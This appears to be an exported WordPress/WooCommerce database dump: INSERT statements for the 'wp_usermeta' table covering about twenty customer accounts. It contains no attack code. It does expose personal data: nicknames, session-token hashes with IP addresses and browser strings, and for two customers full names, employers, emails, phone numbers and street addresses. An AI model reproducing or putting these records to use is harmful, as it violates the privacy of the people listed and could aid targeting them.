INSERT INTO `wp_usermeta` VALUES (5028, 283, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5029, 283, '_yoast_wpseo_profile_updated', '1482347862'); 
INSERT INTO `wp_usermeta` VALUES (5030, 283, 'session_tokens', 'a:1:{s:64:"814f36936548741e908db050050136b561fd9c911ff268dfff5aab9e11fc9048";a:4:{s:10:"expiration";i:1483557463;s:2:"ip";s:13:"66.194.86.150";s:2:"ua";s:66:"Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1482347863;}}'); 
INSERT INTO `wp_usermeta` VALUES (5031, 284, 'nickname', 'glenn.gass'); 
INSERT INTO `wp_usermeta` VALUES (5032, 284, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5033, 284, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5034, 284, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5035, 284, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5036, 284, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5037, 284, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5038, 284, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5039, 284, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5040, 284, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5041, 284, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5042, 284, '_yoast_wpseo_profile_updated', '1482353849'); 
INSERT INTO `wp_usermeta` VALUES (5044, 285, 'nickname', 'tbinion'); 
INSERT INTO `wp_usermeta` VALUES (5045, 285, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5046, 285, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5047, 285, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5048, 285, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5049, 285, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5050, 285, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5051, 285, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5052, 285, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5053, 285, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5054, 285, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5055, 285, '_yoast_wpseo_profile_updated', '1482354722'); 
INSERT INTO `wp_usermeta` VALUES (5057, 285, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5058, 286, 'nickname', 'veaves'); 
INSERT INTO `wp_usermeta` VALUES (5059, 286, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5060, 286, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5061, 286, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5062, 286, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5063, 286, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5064, 286, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5065, 286, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5066, 286, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5067, 286, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5068, 286, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5069, 286, '_yoast_wpseo_profile_updated', '1482358454'); 
INSERT INTO `wp_usermeta` VALUES (5070, 286, 'session_tokens', 'a:1:{s:64:"602648f673e4e4a3ebadead4213ed84d95dd0010cd1552a7a58a465e55bd9650";a:4:{s:10:"expiration";i:1483568055;s:2:"ip";s:12:"66.192.27.34";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482358455;}}'); 
INSERT INTO `wp_usermeta` VALUES (5071, 287, 'nickname', 'ken.starlin'); 
INSERT INTO `wp_usermeta` VALUES (5072, 287, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5073, 287, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5074, 287, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5075, 287, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5076, 287, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5077, 287, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5078, 287, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5079, 287, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5080, 287, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5081, 287, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5082, 287, '_yoast_wpseo_profile_updated', '1482364123'); 
INSERT INTO `wp_usermeta` VALUES (5083, 287, 'session_tokens', 'a:1:{s:64:"e716921583a4af203316273917b89d0baefc10002d259e00f114f0fc9fdb3f32";a:4:{s:10:"expiration";i:1483573724;s:2:"ip";s:14:"184.188.182.74";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482364124;}}'); 
INSERT INTO `wp_usermeta` VALUES (5084, 288, 'nickname', 'rlubrent'); 
INSERT INTO `wp_usermeta` VALUES (5085, 288, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5086, 288, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5087, 288, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5088, 288, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5089, 288, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5090, 288, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5091, 288, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5092, 288, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5093, 288, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5094, 288, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5095, 288, '_yoast_wpseo_profile_updated', '1482430281'); 
INSERT INTO `wp_usermeta` VALUES (5096, 288, 'session_tokens', 'a:1:{s:64:"90eab8806dc9fbb8ac86b284681ca7f6aa1db525f910f00634e04966ff1886ae";a:4:{s:10:"expiration";i:1483639883;s:2:"ip";s:14:"72.215.206.194";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1482430283;}}'); 
INSERT INTO `wp_usermeta` VALUES (5097, 289, 'nickname', 'rss358'); 
INSERT INTO `wp_usermeta` VALUES (5098, 289, 'first_name', 'Robert'); 
INSERT INTO `wp_usermeta` VALUES (5099, 289, 'last_name', 'Sprankle'); 
INSERT INTO `wp_usermeta` VALUES (5100, 289, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5101, 289, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5102, 289, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5103, 289, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5104, 289, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5105, 289, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5106, 289, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5107, 289, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5108, 289, '_yoast_wpseo_profile_updated', '1482442222'); 
INSERT INTO `wp_usermeta` VALUES (5109, 289, 'session_tokens', 'a:1:{s:64:"d1b089bdd9566e097da2c730aad579f8c153da977051125f4ff583ae6f431f28";a:4:{s:10:"expiration";i:1483651823;s:2:"ip";s:14:"128.84.241.208";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1482442223;}}'); 
INSERT INTO `wp_usermeta` VALUES (5110, 289, 'last_update', '1482442249'); 
INSERT INTO `wp_usermeta` VALUES (5111, 289, 'billing_first_name', 'Robert'); 
INSERT INTO `wp_usermeta` VALUES (5112, 289, 'billing_last_name', 'Sprankle'); 
INSERT INTO `wp_usermeta` VALUES (5113, 289, 'billing_company', 'Cornell University'); 
INSERT INTO `wp_usermeta` VALUES (5114, 289, 'billing_email', 'rss358@cornell.edu'); 
INSERT INTO `wp_usermeta` VALUES (5115, 289, 'billing_phone', '607-255-3966'); 
INSERT INTO `wp_usermeta` VALUES (5116, 289, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5117, 289, 'billing_address_1', '245 East Ave.'); 
INSERT INTO `wp_usermeta` VALUES (5118, 289, 'billing_address_2', 'Physical Sciences Building room G20'); 
INSERT INTO `wp_usermeta` VALUES (5119, 289, 'billing_city', 'Ithaca'); 
INSERT INTO `wp_usermeta` VALUES (5120, 289, 'billing_state', 'NY'); 
INSERT INTO `wp_usermeta` VALUES (5121, 289, 'billing_postcode', '14853'); 
INSERT INTO `wp_usermeta` VALUES (5122, 289, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5123, 290, 'nickname', 'AustinMartins'); 
INSERT INTO `wp_usermeta` VALUES (5124, 290, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5125, 290, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5126, 290, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5127, 290, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5128, 290, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5129, 290, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5130, 290, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5131, 290, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5132, 290, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5133, 290, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5134, 290, '_yoast_wpseo_profile_updated', '1482495241'); 
INSERT INTO `wp_usermeta` VALUES (5137, 291, 'nickname', 'ctsales'); 
INSERT INTO `wp_usermeta` VALUES (5138, 291, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5139, 291, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5140, 291, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5141, 291, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5142, 291, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5143, 291, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5144, 291, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5145, 291, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5146, 291, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5147, 291, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5148, 291, '_yoast_wpseo_profile_updated', '1482922155'); 
INSERT INTO `wp_usermeta` VALUES (5150, 292, 'nickname', 'rthomas'); 
INSERT INTO `wp_usermeta` VALUES (5151, 292, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5152, 292, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5153, 292, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5154, 292, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5155, 292, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5156, 292, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5157, 292, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5158, 292, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5159, 292, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5160, 292, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5161, 292, '_yoast_wpseo_profile_updated', '1482923181'); 
INSERT INTO `wp_usermeta` VALUES (5162, 292, 'session_tokens', 'a:1:{s:64:"1d307bd9ebc0c66f14cc150ffeec243aac13e3059f78f1ecddb84aca4f1d4dee";a:4:{s:10:"expiration";i:1484132782;s:2:"ip";s:12:"27.251.53.59";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1482923182;}}'); 
INSERT INTO `wp_usermeta` VALUES (5163, 293, 'nickname', 'radmila.petrovich'); 
INSERT INTO `wp_usermeta` VALUES (5164, 293, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5165, 293, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5166, 293, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5167, 293, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5168, 293, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5169, 293, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5170, 293, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5171, 293, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5172, 293, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5173, 293, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5174, 293, '_yoast_wpseo_profile_updated', '1482932996'); 
INSERT INTO `wp_usermeta` VALUES (5175, 293, 'session_tokens', 'a:2:{s:64:"b780166fe64080b037f4131ee9ba6931a728ace8cae982a16f4aa03e42c2a80e";a:4:{s:10:"expiration";i:1484142598;s:2:"ip";s:14:"209.248.152.66";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482932998;}s:64:"fe1558c85ddd86a5ccae528c7f04251e0903fafd307997ba47b0926287aa56b3";a:4:{s:10:"expiration";i:1483105845;s:2:"ip";s:14:"209.248.152.66";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482933045;}}'); 
INSERT INTO `wp_usermeta` VALUES (5177, 294, 'nickname', 'mcaron'); 
INSERT INTO `wp_usermeta` VALUES (5178, 294, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5179, 294, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5180, 294, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5181, 294, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5182, 294, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5183, 294, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5184, 294, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5185, 294, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5186, 294, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5187, 294, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5188, 294, '_yoast_wpseo_profile_updated', '1482951135'); 
INSERT INTO `wp_usermeta` VALUES (5189, 294, 'session_tokens', 'a:1:{s:64:"16cbdd70f13b84fb15432f70a724ea1407c1bd6365b1e5c1f6dd819df127e8c9";a:4:{s:10:"expiration";i:1484160736;s:2:"ip";s:15:"104.129.194.118";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482951136;}}'); 
INSERT INTO `wp_usermeta` VALUES (5190, 295, 'nickname', 'markoh'); 
INSERT INTO `wp_usermeta` VALUES (5191, 295, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5192, 295, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5193, 295, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5194, 295, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5195, 295, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5196, 295, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5197, 295, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5198, 295, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5199, 295, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5200, 295, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5201, 295, '_yoast_wpseo_profile_updated', '1482951389'); 
INSERT INTO `wp_usermeta` VALUES (5202, 295, 'session_tokens', 'a:1:{s:64:"081ea7bc2c7d1fb074c87097e17f563ecc6fe80a1b2cf2534fb7efdea7af0f29";a:4:{s:10:"expiration";i:1484160990;s:2:"ip";s:14:"173.63.236.163";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0";s:5:"login";i:1482951390;}}'); 
INSERT INTO `wp_usermeta` VALUES (5203, 295, 'billing_first_name', 'Mark'); 
INSERT INTO `wp_usermeta` VALUES (5204, 295, 'billing_last_name', 'Oh'); 
INSERT INTO `wp_usermeta` VALUES (5205, 295, 'billing_company', 'Bitro Group'); 
INSERT INTO `wp_usermeta` VALUES (5206, 295, 'billing_email', 'markoh@bitrogroup.com'); 
INSERT INTO `wp_usermeta` VALUES (5207, 295, 'billing_phone', '860-315-0107'); 
INSERT INTO `wp_usermeta` VALUES (5208, 295, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (5209, 295, 'billing_address_1', '300 Lodi St'); 
INSERT INTO `wp_usermeta` VALUES (5210, 295, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (5211, 295, 'billing_city', 'Hackensack'); 
INSERT INTO `wp_usermeta` VALUES (5212, 295, 'billing_state', 'NJ'); 
INSERT INTO `wp_usermeta` VALUES (5213, 295, 'billing_postcode', '07601'); 
INSERT INTO `wp_usermeta` VALUES (5214, 295, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5215, 296, 'nickname', 'steve'); 
INSERT INTO `wp_usermeta` VALUES (5216, 296, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5217, 296, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5218, 296, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5219, 296, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5220, 296, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5221, 296, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5222, 296, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5223, 296, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5224, 296, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5225, 296, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5226, 296, '_yoast_wpseo_profile_updated', '1482952469'); 
INSERT INTO `wp_usermeta` VALUES (5227, 296, 'session_tokens', 'a:1:{s:64:"837b9a652d896b61f8681738c108ad52bbeef0338ba0f3474f8af6114a11d3da";a:4:{s:10:"expiration";i:1489081154;s:2:"ip";s:14:"111.93.191.254";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1488908354;}}'); 
INSERT INTO `wp_usermeta` VALUES (5228, 297, 'nickname', 'no'); 
INSERT INTO `wp_usermeta` VALUES (5229, 297, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5230, 297, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5231, 297, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5232, 297, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5233, 297, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5234, 297, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5235, 297, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5236, 297, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5237, 297, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5238, 297, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5239, 297, '_yoast_wpseo_profile_updated', '1482961391'); 
INSERT INTO `wp_usermeta` VALUES (5240, 297, 'session_tokens', 'a:1:{s:64:"ff639c2d217c6c59296657cc9fc9db682c042dd2731cd6c076ea17c84989e699";a:4:{s:10:"expiration";i:1484170992;s:2:"ip";s:13:"66.188.47.134";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482961392;}}'); 
INSERT INTO `wp_usermeta` VALUES (5241, 297, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5242, 298, 'nickname', 'Charles.cook'); 
INSERT INTO `wp_usermeta` VALUES (5243, 298, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5244, 298, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5245, 298, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5246, 298, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5247, 298, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5248, 298, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5249, 298, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5250, 298, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5251, 298, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5252, 298, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5253, 298, '_yoast_wpseo_profile_updated', '1483026710'); 
INSERT INTO `wp_usermeta` VALUES (5255, 299, 'nickname', 'joanne.medeiros'); 
INSERT INTO `wp_usermeta` VALUES (5256, 299, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5257, 299, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5258, 299, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5259, 299, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5260, 299, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5261, 299, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5262, 299, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5263, 299, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5264, 299, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5265, 299, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5266, 299, '_yoast_wpseo_profile_updated', '1483063781'); 
INSERT INTO `wp_usermeta` VALUES (5267, 299, 'session_tokens', 'a:1:{s:64:"4f6bb534c53b2dfd4fb5908aba6ceb6ea62d0778e31fd9a97549dfd20365b423";a:4:{s:10:"expiration";i:1484273382;s:2:"ip";s:13:"204.76.113.51";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1483063782;}}'); 
INSERT INTO `wp_usermeta` VALUES (5268, 300, 'nickname', 'khernandez'); 
INSERT INTO `wp_usermeta` VALUES (5269, 300, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5270, 300, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5271, 300, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5272, 300, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5273, 300, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5274, 300, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5275, 300, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5276, 300, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5277, 300, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5278, 300, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5279, 300, '_yoast_wpseo_profile_updated', '1483135945'); 
INSERT INTO `wp_usermeta` VALUES (5280, 300, 'session_tokens', 'a:1:{s:64:"927005eadf10a62500b31d655717460261d9dadd6cbf2e3bfc63b9fad6b86800";a:4:{s:10:"expiration";i:1484345546;s:2:"ip";s:11:"38.128.76.3";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1483135946;}}'); 
INSERT INTO `wp_usermeta` VALUES (5281, 300, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5282, 301, 'nickname', 'ginger.arant'); 
INSERT INTO `wp_usermeta` VALUES (5283, 301, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5284, 301, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5285, 301, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5286, 301, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5287, 301, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5288, 301, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5289, 301, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5290, 301, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5291, 301, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5292, 301, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5293, 301, '_yoast_wpseo_profile_updated', '1483391914'); 
INSERT INTO `wp_usermeta` VALUES (5294, 301, 'session_tokens', 'a:1:{s:64:"6fa2d41c2c020c283549925ca03195846471136e47e39eb7369a00cefaaac498";a:4:{s:10:"expiration";i:1484601516;s:2:"ip";s:12:"65.69.80.190";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1483391916;}}'); 
INSERT INTO `wp_usermeta` VALUES (5295, 302, 'nickname', 'jameshorne'); 
INSERT INTO `wp_usermeta` VALUES (5296, 302, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5297, 302, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5298, 302, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5299, 302, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5300, 302, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5301, 302, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5302, 302, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5303, 302, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5304, 302, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5305, 302, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5306, 302, '_yoast_wpseo_profile_updated', '1483449794'); 
